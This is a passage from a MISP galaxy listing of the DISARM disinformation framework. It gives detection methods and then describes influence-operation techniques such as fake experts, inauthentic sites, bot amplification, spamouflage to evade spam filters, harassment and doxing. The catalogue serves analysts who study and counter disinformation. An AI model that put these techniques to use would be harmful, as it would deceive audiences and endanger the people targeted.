https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00066.md

Data forensics

The tag is: misp-galaxy:disarm-detections="Data forensics"

Table 1226. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00067.md

Resonance analysis

A developing methodology for identifying statistical differences in how social groups use language and quantifying how common those statistical differences are within a larger population. In essence, it hypothesises how much affinity might exist for a specific group within a general population, based on the language its members employ.

The tag is: misp-galaxy:disarm-detections="Resonance analysis"

Table 1227. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00068.md

Track Russian media and develop analytic methods.

To effectively counter Russian propaganda, it will be critical to track Russian influence efforts. The information requirements are varied and include the following:

• Identify fake-news stories and their sources.

• Understand narrative themes and content that pervade various Russian media sources.

• Understand the broader Russian strategy that underlies tactical propaganda messaging.

The tag is: misp-galaxy:disarm-detections="Track Russian media and develop analytic methods."

Table 1228. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00069.md

Full spectrum analytics

The tag is: misp-galaxy:disarm-detections="Full spectrum analytics"

Table 1229. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00070.md

Network analysis Identify/cultivate/support influencers

Local influencers detected via Twitter networks are likely local influencers in other online and off-line channels as well. In addition, the content and themes gleaned from Russia and Russia-supporting populations, as well as anti-Russia activists, likely swirl in other online and off-line mediums as well.

The tag is: misp-galaxy:disarm-detections="Network analysis Identify/cultivate/support influencers"

Table 1230. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00071.md

network analysis to identify central users in the pro-Russia activist community.

It is possible that some of these are bots or trolls and could be flagged for suspension for violating Twitter’s terms of service.

The tag is: misp-galaxy:disarm-detections="network analysis to identify central users in the pro-Russia activist community."

Table 1231. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00072.md

collect intel/recon on black/covert content creators/manipulators

Players at the level of covert attribution, referred to as “black” in the grayscale of deniability, produce content on user-generated media, such as YouTube, but also add fear-mongering commentary to and amplify content produced by others and supply exploitable content to data dump websites. These activities are conducted by a network of trolls, bots, honeypots, and hackers.

The tag is: misp-galaxy:disarm-detections="collect intel/recon on black/covert content creators/manipulators"

Table 1232. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00073.md

identify relevant fence-sitter communities

Brand ambassador programmes could be used with influencers across a variety of social media channels. They could also target other prominent experts, such as academics, business leaders, and other potentially prominent people. Authorities must ultimately take care in implementing such a programme given the risk that contact with U.S. or NATO authorities might damage influencer reputations. Engagements must consequently be made with care, and, if possible, government interlocutors should work through local NGOs.

The tag is: misp-galaxy:disarm-detections="identify relevant fence-sitter communities"

Table 1233. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00074.md

leverage open-source information

Significant amounts of quality open-source information are now available and should be leveraged to build products and analysis prior to problem prioritisation in the areas of observation, attribution, and intent. Successfully distinguishing the grey zone campaign signal through the global noise requires action through the entirety of the national security community. Policy, process, and tools must all adapt and evolve to detect, discern, and act upon a new type of signal.

The tag is: misp-galaxy:disarm-detections="leverage open-source information"

Table 1234. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00075.md

Monitor/collect audience engagement data connected to “useful idiots”

Target the audience connected to "useful idiots" rather than the specific profiles, because the active presence of such sources complicates targeting of Russian propaganda, given that it is often difficult to discriminate between authentic views and opinions on the internet and those disseminated by the Russian state.

The tag is: misp-galaxy:disarm-detections="Monitor/collect audience engagement data connected to “useful idiots”"

Table 1235. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00076.md

Model for bot account behaviour

Bot account: action based, people. Unsure which DISARM techniques.

The tag is: misp-galaxy:disarm-detections="Model for bot account behaviour"

Table 1236. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00077.md

Network anomaly detection

The tag is: misp-galaxy:disarm-detections="Network anomaly detection"

Table 1237. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00079.md

Hack the polls/ content yourself

Two wrongs don’t make a right? But if you hack your own polls, you do learn how it could be done, and learn what to look for.

The tag is: misp-galaxy:disarm-detections="Hack the polls/ content yourself"

Table 1238. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00080.md

Need way for end user to report operations

The tag is: misp-galaxy:disarm-detections="Need way for end user to report operations"

Table 1239. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00081.md

Control the US "slang" translation boards

The tag is: misp-galaxy:disarm-detections="Control the US "slang" translation boards"

Table 1240. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00082.md

Build and own meme generator, then track and watermark contents

The tag is: misp-galaxy:disarm-detections="Build and own meme generator, then track and watermark contents"

Table 1241. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00083.md

Track individual bad actors

The tag is: misp-galaxy:disarm-detections="Track individual bad actors"

Table 1242. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00084.md

detection of a weak signal through global noise

Grey zone threats are challenging given that warning requires detection of a weak signal through global noise and across threat vectors and regional boundaries. Three interconnected grey zone elements characterise the nature of the activity:

Temporality: The nature of grey zone threats truly requires a “big picture view” over long timescales and across regions and functional topics.

Attribution: Requiring an “almost certain” or “nearly certain” analytic assessment before acting costs time and analytic effort.

Intent: Judgement of adversarial intent to conduct grey zone activity. Indeed, the purpose of countering grey zone threats is to deter adversaries from fulfilling their intent to act. While attribution is one piece of the puzzle, closing the space around intent often means synthesising multiple relevant indicators and warnings, including the state’s geopolitical ambitions, military ties, trade and investment, level of corruption, and media landscape, among others.

The tag is: misp-galaxy:disarm-detections="detection of a weak signal through global noise"

Table 1243. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00085.md

Outpace Competitor Intelligence Capabilities

Develop an intelligence-based understanding of foreign actors’ motivations, psychologies, and societal and geopolitical contexts. Leverage artificial intelligence to identify patterns and infer competitors’ intent.

The tag is: misp-galaxy:disarm-detections="Outpace Competitor Intelligence Capabilities"

Table 1244. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00086.md

Improve Indications and Warning

The United States has not adequately adapted its information indicators and thresholds for warning policymakers to account for grey zone tactics. Competitors have undertaken a marked shift to slow-burn, deceptive, non-military, and indirect challenges to U.S. interests. Relative to traditional security indicators and warnings, these are more numerous and harder to detect, and they make it difficult for analysts to infer intent.

The tag is: misp-galaxy:disarm-detections="Improve Indications and Warning"

Table 1245. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00087.md

Revitalise an “active measures working group,”

Recognise campaigns from weak signals, including rivals’ intent, capability, impact, interactive effects, and impact on U.S. interests… focus on adversarial covert action aspects of campaigning.

The tag is: misp-galaxy:disarm-detections="Revitalise an “active measures working group,”"

Table 1246. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00088.md

target/name/flag "grey zone" website content

"Grey zone" is the second level of content producers and circulators, composed of outlets with uncertain attribution. This category covers conspiracy websites, far-right or far-left websites, news aggregators, and data dump websites.

The tag is: misp-galaxy:disarm-detections="target/name/flag "grey zone" website content"

Table 1247. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00089.md

Match Punitive Tools with Third-Party Inducements

Bring private sector and civil society into accord on U.S. interests

The tag is: misp-galaxy:disarm-detections="Match Punitive Tools with Third-Party Inducements"

Table 1248. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00090.md

Partner to develop analytic methods & tools

This might include working with relevant technology firms to ensure that contracted analytic support is available. Contracted support is reportedly valuable because technology to monitor social media data is continually evolving; such firms can provide the expertise to help identify and analyse trends, and they can more effectively stay abreast of the changing systems and develop new models as they are required.

The tag is: misp-galaxy:disarm-detections="Partner to develop analytic methods & tools"

Table 1249. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00091.md

daylight

Warn social media companies about an ongoing campaign (e.g. antivax sites). Anyone with datasets or data summaries can help with this.

The tag is: misp-galaxy:disarm-detections="daylight"

Table 1250. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00092.md

S4d detection and re-allocation approaches

S4D is a way to separate out different speakers in text, audio.

The tag is: misp-galaxy:disarm-detections="S4d detection and re-allocation approaches"

Table 1251. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00093.md

Registries alert when large batches of newsy URLs get registered together

The tag is: misp-galaxy:disarm-detections="Registries alert when large batches of newsy URLs get registered together"

Table 1252. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00094.md

Fact checking

Process suspicious artefacts, narratives, and incidents

The tag is: misp-galaxy:disarm-detections="Fact checking"

Table 1253. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00095.md

Techniques

DISARM is a framework designed for describing and understanding disinformation incidents.

Techniques is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Facilitate State Propaganda

Organise citizens around pro-state messaging. Coordinate paid or volunteer groups to push state propaganda.

The tag is: misp-galaxy:disarm-techniques="Facilitate State Propaganda"

Table 1254. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0002.md

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consistent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplification practices.

The tag is: misp-galaxy:disarm-techniques="Leverage Existing Narratives"

Table 1255. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0003.md

Develop Competing Narratives

Advance competing narratives connected to the same issue, i.e. on one hand deny the incident while at the same time expressing dismissal. Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centred on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on. These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:disarm-techniques="Develop Competing Narratives"

Table 1256. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0004.md

Create Inauthentic Social Media Pages and Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets. Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Social Media Pages and Groups"

Table 1257. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0007.md

Create Fake Experts

Stories planted or promoted in computational propaganda operations often make use of experts fabricated from whole cloth, sometimes specifically for the story itself.

The tag is: misp-galaxy:disarm-techniques="Create Fake Experts"

Table 1258. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0009.md

Utilise Academic/Pseudoscientific Justifications

Utilise Academic/Pseudoscientific Justifications

The tag is: misp-galaxy:disarm-techniques="Utilise Academic/Pseudoscientific Justifications"

Table 1259. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0009.001.md

Cultivate Ignorant Agents

Cultivate propagandists for a cause, the goals of which are not fully comprehended, and who are used cynically by the leaders of the cause. Independent actors use social media and specialised web sites to strategically reinforce and spread messages compatible with their own. Their networks are infiltrated and used by state media disinformation organisations to amplify the state’s own disinformation strategies against target populations. Many are traffickers in conspiracy theories or hoaxes, unified by a suspicion of Western governments and mainstream media. Their narratives, which appeal to leftists hostile to globalism and military intervention and nationalists against immigration, are frequently infiltrated and shaped by state-controlled trolls and altered news items from agencies such as RT and Sputnik. Also known as "useful idiots" or "unwitting agents".

The tag is: misp-galaxy:disarm-techniques="Cultivate Ignorant Agents"

Table 1260. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0010.md

Create Inauthentic Websites

Create media assets to support inauthentic organisations (e.g. think tank), people (e.g. experts) and/or serve as sites to distribute malware/launch phishing operations.

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic Websites"

Table 1261. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0013.md

Prepare Fundraising Campaigns

Fundraising campaigns refer to an influence operation’s systematic effort to seek financial support for a charity, cause, or other enterprise using online activities that further promote operation information pathways while raising a profit. Many influence operations have engaged in crowdfunding services on platforms including Tipeee, Patreon, and GoFundMe. An operation may use its previously prepared fundraising campaigns (see: Develop Information Pathways) to promote operation messaging while raising money to support its activities.

The tag is: misp-galaxy:disarm-techniques="Prepare Fundraising Campaigns"

Table 1262. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.md

Raise Funds from Malign Actors

Raising funds from malign actors may include contributions from foreign agents, cutouts or proxies, shell companies, dark money groups, etc.

The tag is: misp-galaxy:disarm-techniques="Raise Funds from Malign Actors"

Table 1263. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.001.md

Raise Funds from Ignorant Agents

Raising funds from ignorant agents may include scams, donations intended for one stated purpose but then used for another, etc.

The tag is: misp-galaxy:disarm-techniques="Raise Funds from Ignorant Agents"

Table 1264. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0014.002.md

Create Hashtags and Search Artefacts

Create one or more hashtags and/or hashtag groups. Many incident-based campaigns will create hashtags to promote their fabricated event. Creating a hashtag for an incident can have two important effects: 1. Create a perception of reality around an event. Certainly only "real" events would be discussed in a hashtag. After all, the event has a name! 2. Publicise the story more widely through trending lists and search behaviour. This is an asset needed to direct/control/manage the "conversation" connected to launching a new incident/campaign with a new hashtag on the applicable social media sites.

The tag is: misp-galaxy:disarm-techniques="Create Hashtags and Search Artefacts"

Table 1265. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0015.md

Create Clickbait

Create attention-grabbing headlines (outrage, doubt, humour) required to drive traffic and engagement. This is a key asset.

The tag is: misp-galaxy:disarm-techniques="Create Clickbait"

Table 1266. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0016.md

Conduct Fundraising

Fundraising campaigns refer to an influence operation’s systematic effort to seek financial support for a charity, cause, or other enterprise using online activities that further promote operation information pathways while raising a profit. Many influence operations have engaged in crowdfunding services on platforms including Tipeee, Patreon, and GoFundMe. An operation may use its previously prepared fundraising campaigns to promote operation messaging while raising money to support its activities.

The tag is: misp-galaxy:disarm-techniques="Conduct Fundraising"

Table 1267. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0017.md

Conduct Crowdfunding Campaigns

An influence operation may Conduct Crowdfunding Campaigns on platforms such as GoFundMe, GiveSendGo, Tipeee, Patreon, etc.

The tag is: misp-galaxy:disarm-techniques="Conduct Crowdfunding Campaigns"

Table 1268. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0017.001.md

Purchase Targeted Advertisements

Create or fund advertisements targeted at specific populations.

The tag is: misp-galaxy:disarm-techniques="Purchase Targeted Advertisements"

Table 1269. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0018.md

Trial Content

Iteratively test incident performance (messages, content, etc.), e.g. A/B test headline/content engagement metrics, or website and/or funding campaign conversion rates.

The tag is: misp-galaxy:disarm-techniques="Trial Content"

Table 1270. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0020.md

Leverage Conspiracy Theory Narratives

"Conspiracy narratives" appeal to the human desire for explanatory order, by invoking the participation of powerful (often sinister) actors in pursuit of their own political goals. These narratives are especially appealing when an audience is low-information, marginalised or otherwise inclined to reject the prevailing explanation. Conspiracy narratives are an important component of the "firehose of falsehoods" model.

The tag is: misp-galaxy:disarm-techniques="Leverage Conspiracy Theory Narratives"

Table 1271. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.md

Amplify Existing Conspiracy Theory Narratives

An influence operation may amplify an existing conspiracy theory narrative that aligns with its incident or campaign goals. By amplifying existing conspiracy theory narratives, operators can leverage the power of the existing communities that support and propagate those theories without needing to expend resources creating new narratives or building momentum and buy in around new narratives.

The tag is: misp-galaxy:disarm-techniques="Amplify Existing Conspiracy Theory Narratives"

Table 1272. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.001.md

Develop Original Conspiracy Theory Narratives

While this requires more resources than amplifying existing conspiracy theory narratives, an influence operation may develop original conspiracy theory narratives in order to achieve greater control and alignment over the narrative and their campaign goals. Prominent examples include the USSR’s Operation INFEKTION disinformation campaign run by the KGB in the 1980s to plant the idea that the United States had invented HIV/AIDS as part of a biological weapons research project at Fort Detrick, Maryland. More recently, Fort Detrick featured prominently in new conspiracy theory narratives around the origins of the COVID-19 outbreak and pandemic.

The tag is: misp-galaxy:disarm-techniques="Develop Original Conspiracy Theory Narratives"

Table 1273. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0022.002.md

Distort Facts

Change, twist, or exaggerate existing facts to construct a narrative that differs from reality. Examples: images and ideas can be distorted by being placed in an improper context.

The tag is: misp-galaxy:disarm-techniques="Distort Facts"

Table 1274. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.md

Reframe Context

Reframing context refers to removing an event from its surrounding context to distort its intended meaning. Rather than deny that an event occurred, reframing context frames an event in a manner that may lead the target audience to draw a different conclusion about its intentions.

The tag is: misp-galaxy:disarm-techniques="Reframe Context"

Table 1275. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.001.md

Edit Open-Source Content

An influence operation may edit open-source content, such as collaborative blogs or encyclopaedias, to promote its narratives on outlets with existing credibility and audiences. Editing open-source content may allow an operation to post content on platforms without dedicating resources to the creation and maintenance of its own assets.

The tag is: misp-galaxy:disarm-techniques="Edit Open-Source Content"

Table 1276. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0023.002.md

Online Polls

Create fake online polls, or manipulate existing online polls. A data-gathering tactic to target those who engage, and potentially their networks of friends/followers as well.

The tag is: misp-galaxy:disarm-techniques="Online Polls"

Table 1277. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0029.md

Bait Influencer

Influencers are people on social media platforms who have large audiences. 

Threat Actors can try to trick Influencers such as celebrities, journalists, or local leaders who aren’t associated with their campaign into amplifying campaign content. This gives them access to the Influencer’s audience without having to go through the effort of building it themselves, and it helps legitimise their message by associating it with the Influencer, benefitting from their audience’s trust in them.

The tag is: misp-galaxy:disarm-techniques="Bait Influencer"

Table 1278. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0039.md

Demand Insurmountable Proof

Campaigns often leverage tactical and informational asymmetries on the threat surface, as seen in the Distort and Deny strategies, and the "firehose of misinformation". Specifically, conspiracy theorists can be repeatedly wrong, but advocates of the truth need to be perfect. By constantly escalating demands for proof, propagandists can effectively leverage this asymmetry while also priming its future use, often with an even greater asymmetric advantage. The conspiracist is offered freer rein for a broader range of "questions" while the truth teller is burdened with higher and higher standards of proof.

The tag is: misp-galaxy:disarm-techniques="Demand Insurmountable Proof"

Table 1279. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0040.md

Seed Kernel of Truth

Wrap lies or altered context/facts around truths. Influence campaigns pursue a variety of objectives with respect to target audiences, prominent among them: 1. undermine a narrative commonly referenced in the target audience; or 2. promote a narrative less common in the target audience, but preferred by the attacker. In both cases, the attacker is presented with a heavy lift. They must change the relative importance of various narratives in the interpretation of events, despite contrary tendencies. When messaging makes use of factual reporting to promote these adjustments in the narrative space, they are less likely to be dismissed out of hand; when messaging can juxtapose a (factual) truth about current affairs with the (abstract) truth explicated in these narratives, propagandists can undermine or promote them selectively. Context matters.

The tag is: misp-galaxy:disarm-techniques="Seed Kernel of Truth"

Table 1280. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0042.md

Chat Apps

Direct messaging via chat app is an increasing method of delivery. These messages are often automated and new delivery and storage methods make them anonymous, viral, and ephemeral. This is a difficult space to monitor, but also a difficult space to build acclaim or notoriety.

The tag is: misp-galaxy:disarm-techniques="Chat Apps"

Table 1281. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.md

Use Encrypted Chat Apps

Examples include Signal, WhatsApp, Discord, Wire, etc.

The tag is: misp-galaxy:disarm-techniques="Use Encrypted Chat Apps"

Table 1282. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.001.md

Use Unencrypted Chats Apps

Examples include SMS, etc.

The tag is: misp-galaxy:disarm-techniques="Use Unencrypted Chats Apps"

Table 1283. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0043.002.md

Seed Distortions

Try a wide variety of messages in the early hours surrounding an incident or event, to give a misleading account or impression.

The tag is: misp-galaxy:disarm-techniques="Seed Distortions"

Table 1284. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0044.md

Use Fake Experts

Use the fake experts that were set up during Establish Legitimacy. Pseudo-experts are disposable assets that often appear once and then disappear. They give "credibility" to misinformation and take advantage of credential bias.

The tag is: misp-galaxy:disarm-techniques="Use Fake Experts"

Table 1285. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0045.md

Use Search Engine Optimisation

Manipulate content engagement metrics (e.g. on Reddit and Twitter) to influence/impact news search results (e.g. Google); this also elevates RT and Sputnik headlines into Google News alert emails. Also known as "black-hat SEO".

The tag is: misp-galaxy:disarm-techniques="Use Search Engine Optimisation"

Table 1286. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0046.md

Censor Social Media as a Political Force

Use political influence or the power of the state to stop critical social media comments, e.g. government-requested/driven content takedowns (see Google Transparency reports).

The tag is: misp-galaxy:disarm-techniques="Censor Social Media as a Political Force"

Table 1287. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0047.md

Harass

Threatening or harassing believers of opposing narratives refers to the use of intimidation techniques, including cyberbullying and doxing, to discourage opponents from voicing their dissent. An influence operation may threaten or harass believers of the opposing narratives to deter individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Harass"

Table 1288. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.md

Boycott/"Cancel" Opponents

Cancel culture refers to the phenomenon in which individuals collectively refrain from supporting an individual, organisation, business, or other entity, usually following a real or falsified controversy. An influence operation may exploit cancel culture by emphasising an adversary’s problematic or disputed behaviour and presenting its own content as an alternative.

The tag is: misp-galaxy:disarm-techniques="Boycott/"Cancel" Opponents"

Table 1289. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.001.md

Harass People Based on Identities

Examples include social identities like gender, sexuality, race, ethnicity, religion, ability, nationality, etc. as well as roles and occupations like journalist or activist.

The tag is: misp-galaxy:disarm-techniques="Harass People Based on Identities"

Table 1290. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.002.md

Threaten to Dox

Doxing refers to online harassment in which individuals publicly release private information about another individual, including names, addresses, employment information, pictures, family members, and other sensitive information. An influence operation may dox its opposition to encourage individuals aligned with operation narratives to harass the doxed individuals themselves or otherwise discourage the doxed individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Threaten to Dox"

Table 1291. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.003.md

Dox

Doxing refers to online harassment in which individuals publicly release private information about another individual, including names, addresses, employment information, pictures, family members, and other sensitive information. An influence operation may dox its opposition to encourage individuals aligned with operation narratives to harass the doxed individuals themselves or otherwise discourage the doxed individuals from posting or proliferating conflicting content.

The tag is: misp-galaxy:disarm-techniques="Dox"

Table 1292. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0048.004.md

Flood Information Space

Flooding sources of information (e.g. Social Media feeds) with a high volume of inauthentic content.

This can be done to control/shape online conversations, drown out opposing points of view, or make it harder to find legitimate information. 

Bots and/or patriotic trolls are effective tools to achieve this effect.

This Technique previously used the name Flooding the Information Space.

The tag is: misp-galaxy:disarm-techniques="Flood Information Space"

Table 1293. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.md

Trolls Amplify and Manipulate

Use trolls to amplify narratives and/or manipulate narratives. Fake profiles/sockpuppets operate to support individuals/narratives from the entire political spectrum (left/right binary). They operate with increased emphasis on promoting local content and promoting real Twitter users generating their own, often divisive political content, as it’s easier to amplify existing content than to create new/original content. Trolls operate wherever there’s a socially divisive issue (issues that can be or are politicised).

The tag is: misp-galaxy:disarm-techniques="Trolls Amplify and Manipulate"

Table 1294. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.001.md

Flood Existing Hashtag

Hashtags can be used by communities to collate information they post about particular topics (such as their interests, or current events) and users can find communities to join by exploring hashtags they’re interested in. 

Threat actors can flood an existing hashtag to try to ruin hashtag functionality, posting content unrelated to the hashtag alongside it, making it a less reliable source of relevant information. They may also try to flood existing hashtags with campaign content, with the intent of maximising exposure to users.

This Technique covers cases where threat actors flood existing hashtags with campaign content.

This Technique covers behaviours previously documented by T0019.002: Hijack Hashtags, which has since been deprecated. This Technique was previously called Hijack Existing Hashtag.

The tag is: misp-galaxy:disarm-techniques="Flood Existing Hashtag"

Table 1295. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.002.md

Bots Amplify via Automated Forwarding and Reposting

Automated forwarding and reposting refer to the proliferation of operation content using automated means, such as artificial intelligence or social media bots. An influence operation may use automated activity to increase content exposure without dedicating the resources, including personnel and time, traditionally required to forward and repost content. Use bots to amplify narratives above algorithm thresholds. Bots are automated/programmed profiles designed to amplify content (e.g. automatically retweet or like) and give the appearance that it’s more "popular" than it is. They can operate as a network, to function in a coordinated/orchestrated manner. In some cases (more so now) they are inexpensive/disposable assets used for minimal deployment as bot detection tools improve and platforms are more responsive.

The tag is: misp-galaxy:disarm-techniques="Bots Amplify via Automated Forwarding and Reposting"

Table 1296. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.003.md

Utilise Spamoflauge

Spamoflauge refers to the practice of disguising spam messages as legitimate. Spam refers to the use of electronic messaging systems to send out unrequested or unwanted messages in bulk. Simple methods of spamoflauge include replacing letters with numbers to fool keyword-based email spam filters, for example, "you’ve w0n our jackp0t!". Spamoflauge may extend to more complex techniques such as modifying the grammar or word choice of the language, casting messages as images which spam detectors cannot automatically read, or encapsulating messages in password protected attachments, such as .pdf or .zip files. Influence operations may use spamoflauge to avoid spam filtering systems and increase the likelihood of the target audience receiving operation messaging.

The tag is: misp-galaxy:disarm-techniques="Utilise Spamoflauge"

Table 1297. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.004.md

Conduct Swarming

Swarming refers to the coordinated use of accounts to overwhelm the information space with operation content. Unlike information flooding, swarming centres exclusively around a specific event or actor rather than a general narrative. Swarming relies on “horizontal communication” between information assets rather than a top-down, vertical command-and-control approach.

The tag is: misp-galaxy:disarm-techniques="Conduct Swarming"

Table 1298. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.005.md

Conduct Keyword Squatting

Keyword squatting refers to the creation of online content, such as websites, articles, or social media accounts, around a specific search engine-optimised term to overwhelm the search results of that term. An influence operation may keyword squat to increase content exposure to target audience members who query the exploited term in a search engine and to manipulate the narrative around the term.

The tag is: misp-galaxy:disarm-techniques="Conduct Keyword Squatting"

Table 1299. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.006.md

Inauthentic Sites Amplify News and Narratives

Inauthentic sites circulate and cross-post stories and amplify narratives. Often these sites have no masthead, bylines or attribution.

The tag is: misp-galaxy:disarm-techniques="Inauthentic Sites Amplify News and Narratives"

Table 1300. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0049.007.md

Generate Information Pollution

